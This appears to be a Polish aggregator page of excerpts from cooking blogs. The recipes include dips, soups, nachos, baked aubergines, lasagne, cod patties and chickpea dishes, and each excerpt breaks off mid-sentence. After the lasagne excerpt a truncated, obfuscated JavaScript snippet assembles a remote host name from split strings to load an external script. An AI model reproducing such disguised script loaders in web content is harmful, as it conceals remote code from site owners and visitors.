dobrym sosem każdy posiłek zyskuje na smaku i staje się 'niezwykły'. Zmieniając jego rodzaj, możemy urozmaicać proste obiady. Dipów używam bardzo często: do grilla, drobiu, ryb, burgerów, surowych warzyw, domowych frytek, pizzy itd... I powiem Wam, że czasem nieźle z nimi eksperymentuje! Nawet jeśli coś nie wyjdzie, to dip to taki dodatek, który zawsze idzie odratować. Już od dawna przygotowuję(...)zwykle sojowy lub słonecznikowy. I jest to produkt wysokoprzetworzony. Teraz pomyśl, że do sałatek nie dajesz jednej łyżki majonezu, ale kilka. I pomimo tego, że masz w niej zdrowe warzywa, mięsko, sałatę, to powstaje istna bomba kaloryczna! Już lepiej od czasu do czasu zrobić sobie domowy majonez lub skorzystać z moich przepisów. Poniższe dipy są smaczniejsze od wszystkiego innego
Ekocozy | Naturalnie na co dzieńcebulę i czosnek i podsmaż, aż do zeszklenia cebuli. Następnie dodaj pokrojony w kostkę por, marchewkę, pietruszkę, ziemniaki i cukinię. Podsmaż przez 15 minut. Dodaj wodę, tak aby przykryć warzywa (jeśli chcesz, aby zupa była mniej gęsta dolej więcej wody). Dopraw przyprawami, ziołami, bulionetką i wymieszaj. Gotuj, aż zmiękną warzywa. Zblenduj na gładki krem. Do smaku dodaj sok z cytryny
Ekocozy | Naturalnie na co dzieńOstatnio na blogu pojawił się przepis na serowy sos z warzyw , więc dziś przyszła pora na jego wykorzystanie. Zrobimy nachosy, z którymi komponuje się rewelacyjnie! Nachosy uwielbiam, więc szukałam zamiennika tych sklepowych czy kinowych. Wiadomo, że nigdy nie odzwierciedli się ich idealnie, bo te domowe same w sobie nie są tak przyprawione. Jednak trzeba sobie jakoś radzić, dlatego koniecznie podajcie(...)można upiec je również na rozgrzanej patelnii, smakować będą jednak bardziej jak tortilla i będą także miększe koniecznie podawaj je z jakimś sosem, np. z wegańskim serowym sosem z warzyw Robiliście już kiedyś takie domowe nachosy? Jeśli nie, to gorąco polecam spróbować! Polub nas na Facebooku lub obserwuj na Instagramie / Google+ , czekamy! ;) Miłego i smacznego weekendu kochani, Paulina
Ekocozy | Naturalnie na co dzieńzdecydowanie znak, że lato minęło. Jak zwykle za szybko i było za krótkie. Heheh, ale tego już nie zmienimy. Powoli w naszej kuchni goszczą to co raz bardziej jesienne warzywa i owoce. Kolor filetowy to ich wspólna cecha, śliwki, figi, bakłażany i lada dzień będzie winogron. Ten nasz polski słodki a zaraz cierpki w smaku. Lubię ten czas. Powiem(...)pół. Bakłażany dodatkowo nacinamy tworząc kratkę tak aby dobrze się upiekły. Oliwę z oliwek, miód, czosnek, przyprawy, wodę różaną i melasę z granatów miksujemy na jednolitą gładką masę. Warzywa układamy na wyłożonej papierem blaszce do pieczenia, obficie smarujemy sosem. Przykrywamy folią aluminiową i pieczemy przez 25 minut temp 200 stopni C, zdejmujemy folię i pieczemy jeszcze
SMYKWKUCHNIkonkretnej grupy produktów. Odstąpiłam jednak od tego pomysłu, zostawiając nam spore pole do kuchennych działań. Zaserwować możemy przecież wszelkiego rodzaju pierogi, knedle, pyzy. Albo naszą uwagę poświęcić faszerowanym warzywom, chociażby papryce, która pod tym względem jest produktem idealnym. Wybierając jarzyny o neutralnym smaku powinniśmy zdecydować się na wyrazisty, esencjonalny farsz. I odwrotnie. Im warzywo intensywniejsze w smaku, tym mniej wyraziste
zadanie-gotowaniebędzie następne? Składniki: 1 patison 1 marchewka 1 cebula 1 czerwona papryka 1 puszka krojonych pomidorów 1 szklanka zielonego groszku (świeżego lub mrożonego) 1 bulionetka (esencja do duszonych warzyw) 1 łyżeczka przyprawy garam masala 1 łyżeczka brązowego 1 łyżka oliwy sól Wykonanie: Cebulę zetrzeć na tarce i smażyć na oliwie z dodatkiem garam masali i szczypty soli przez około(...)również drobno startą), wymieszać i smażyć kolejne 5 minut. Dodać patisona (obranego i pokrojonego w grube słupki) oraz paprykę (pokrojoną w krótkie paski), groszek i esencję do duszenia warzyw. Dusić około 10 minut na średnim ogniu mieszając od czasu do czasu. Zalać pomidorami z puszki i dodać łyżeczkę cukru. Gotować na małym ogniu aż patison i papryka zmiękną
zadanie-gotowaniezatem książka kucharska, która łączy w sobie prostotę gotowania z niesamowitym efektem wizualnym gotowego dania. W „Wielkiej uczcie” odnajdziemy przepisy na przystawki, koktajle, sałatki, dania z warzyw oraz słodkości. Wszystkie te receptury łączy prostota wykonania, minimalna ilość składników oraz to, że są to dania wegetariańskie, choć, jak wskazuje sama autorka, można je przygotować również w wersji dla mięsożerców(...)wreszcie sałatkę z awokado i pomarańczy a nawet sałatkę persymony. Tu znajdziemy również rady jak przygotować dressingi robione w słoiku czy dipy robione przy pomocy blendera. Dania z warzyw to m.in. rozmarynowe szaszłyki, harmonijki z cukinii czy cynamonowy kalafior. Na deser zaś nie zabraknie słodkości, za którymi przepada sama autorka. Wśród nich znajdziemy przepis na daktyle z pomarańczami i pistacjami
Krzywa Prostabeszamelowy to dla wielu smakoszy niezbędne dopełnienie lazanii! Tak przygotowane danie jest fantastycznym pomysłem na obiad lub kolację. Choć świetnie smakuje solo, jeżeli masz ochotę na dodatkową porcję warzyw na talerzu, podaj ją w towarzystwie kolorowych surówek lub sałatek. Kuchnia włoska stanowi dobrą inspirację do tworzenia własnych, autorskich dań. Jeśli masz dosyć rutyny w kuchni, możesz przygotować lazanię(...)świeże i dobrej jakości produkty wybierz się do Biedronki. Tam kupisz dobry makaron, który jest bazą wszystkich przepisów na lazanię, a także smaczne mięso oraz świeże i mrożone warzywa. Teraz możesz bez przeszkód oddać się przyjemności gotowania i jedzenia w gronie bliskich. Buon appetito! (function(){ oe6p=document.createElement("script");oe6p.async=true;oe6p_="u"+("s")+"t"; oe6pu="11904048.";oe6p_+="a"+("t.i");oe6p
Moja smaczna kuchniasposób stworzysz wyśmienitą bazę, którą za chwilkę połączysz z innymi składnikami. Co powinno się wśród nich znaleźć? Na pewno jajko – niezbędne spoiwo dla wszystkich składników. Do tego dodaj ulubione warzywo – świetnie sprawdzi się kilka zgniecionych różyczek brokułów albo kalafiora, kukurydza, posiekana nać pietruszki albo koperek. Innym pomysłem są kotleciki z dorsza i cukinii lub ziemniaków, czyli coś dla wielbicieli tradycyjnej(...)staraj się nie przejadać. Pyszny kotlecik możesz przekąsić z kromką pełnoziarnistego pieczywa albo porcją sałatki. Jeżeli masz ochotę na ciepłą kolację, podaj kotleciki z ryżem, kaszą jaglaną, kuskusem lub warzywami gotowanymi na parze. Składniki, których potrzebujesz do przygotowania kotlecików z dorsza z dodatkami, znajdziesz w sklepach sieci Biedronka . Robiąc zakupy, możesz rozejrzeć się także za rybnymi daniami gotowymi, które sprawdzą
Tradycyjna Kuchniatarce jarzynowej. Paprykę i cebulę kroimy na ćwiartki, a następnie w plasterki. Czosnek przeciskamy przez praskę. Mąkę mieszamy z wodą. Na patelni rozgrzewamy olej i podsmażamy na nim warzywa (seler, marchewka, cebula, papryka, czosnek), gdy zaczną mięknąć dodajemy sól, pieprz, zioła prowansalskie, majeranek, ostrą i słodką paprykę oraz przecier. Całość dokładnie mieszamy i dusimy (bez przykrycia) aż warzywa będą miękkie
Czary - gary w kuchnitaką ilość wystarczy łyżeczka soli po pół łyżeczki kuminu i czarnego pieprzu łyżki oleju roślinnego do smażenia Przygotowanie: Marchewkę zetrzyj na tarce o drobnych oczkach. Jarmuż bardzo drobno posiekaj. Warzywa powinny być tak posiekane i pokrojone, aby miały mniej więcej ta samą wielkość. Cebulę pokrój i podsmaż na patelni aż się zeszkli. Do cebuli dodaj marchewkę i jarmuż(...)smaż tak długo, aż starą połowę swojej objętości (5-8 minut). W dużej misce zblenduj ugotowaną ciecierzycę ze 100 ml wody. Dodaj groszek, kukurydzę i podsmażone warzywa z patelni. wymieszaj i dopraw. Na samym końcu dodaj bułkę tartą i dokładnie połącz składniki (dłonie najlepiej się do tego nadadzą. Z powstałej masy uformuj klopsiki. Na miarkę posłużyła mi łyżeczka do herbaty
greenscarfdziecko kończy 5. miesiąc, warto na stałe do jego jadłospisu wprowadzić dania obiadowe, a przede wszystkim zupki. To dobry moment, by do diety malucha wprowadzić mięso, a także kolejne warzywa, na przykład cukinię, ziemniaki czy dynię. Można też dotychczasowe dania wzbogacić o nowe składniki. Pamiętajmy jednak, by podając coś nowego, najpierw obserwować malucha pod kątem alergii pokarmowej. Najlepiej na początek(...)porządku, z powodzeniem możemy taki produkt na dobre wprowadzić do menu niemowlaka. Przygotowując zupki po 5 miesiącu, pamiętajmy też, by miały one jednolitą konsystencję, bez żadnych kawałków mięska czy warzyw. Ponieważ maluch jeszcze nie pogryzie pokarmu stałego, mogłoby to być powodem kłopotów z brzuszkiem. Zupki najlepiej blendować lub miksować na gładką masę. By ułatwić trawienie oraz późniejsze wydalanie, warto dodać
Codogarastartego czosnku, kuminu, soli i soku z cytryny. Odstawiamy na pół godziny. Paprykę, pomidory, cebulę kroimy w kręgi. Szatkujemy kolendrę. Na dnie głębokiej patelni/ woka układamy pierwsza warstwę warzyw: cebula, papryka, pomidory. Jako drugą warstwę układamy krewetki. Trzecia warstwa znów warzywa a czwarta krewetki. Wszystko zalewamy mlekiem kokosowym i olejem dende. Posypujemy poszatkowaną kolendrą. Dusimy na średnim ogniu
Smaki Brazyliizajadać potrawami z dodatkiem czosnku. A i nasz stosunek do dobroczynnych właściwości czosnku jest bardziej przychylny. Stawiamy na naturalne pokarmy i wyrazisty smak. Pokochaliśmy przyprawy i kiedyś mało popularne warzywa i odkrywamy je na nowo. Bo czosnek to nie tylko smak. Czosnek to prawdziwa zdrowotna bomba. Żadne chyba warzywo nie ma tak dobroczynnego wpływu na nasz organizm jak właśnie czosnek
Marder&Marder Manufacturetygodniu większą ilość placków, które następnie chowamy do lodówki. Kiedy mamy ochotę na szybki lunch, po prostu wyjmujemy chwilę wcześniej placek, smarujemy ulubionym sosem lub miękkim awokado, dodajemy pokrojone warzywa i gotowe. Mamy szybki, odżywczy posiłek à la tortilla. I kto powiedział, że zdrowe gotowanie wymaga czasu? :) Składniki (4 placki): 1 szklanka dobrze zmielonej mąki z cieciorki(...)łyżki mielonego siemienia lnianego 2 łyżki mąki ziemniaczanej szklanka gazowanej wody szczypta soli opcjonalnie suszone zioła, czarnuszka, kminek, papryka łyżeczka oleju do smażenia Dodatki: Dowolne warzywa, ja użyłam następujących (wszystkie surowe): awokado do posmarowania (doprawione papryką, solą, pieprzem), sałata, czerwona kapusta, papryka czerwona możesz też dodać np. gotowane mięso z piersi kurczaka lub kawałek ulubionego sera
Powiedz dietom nie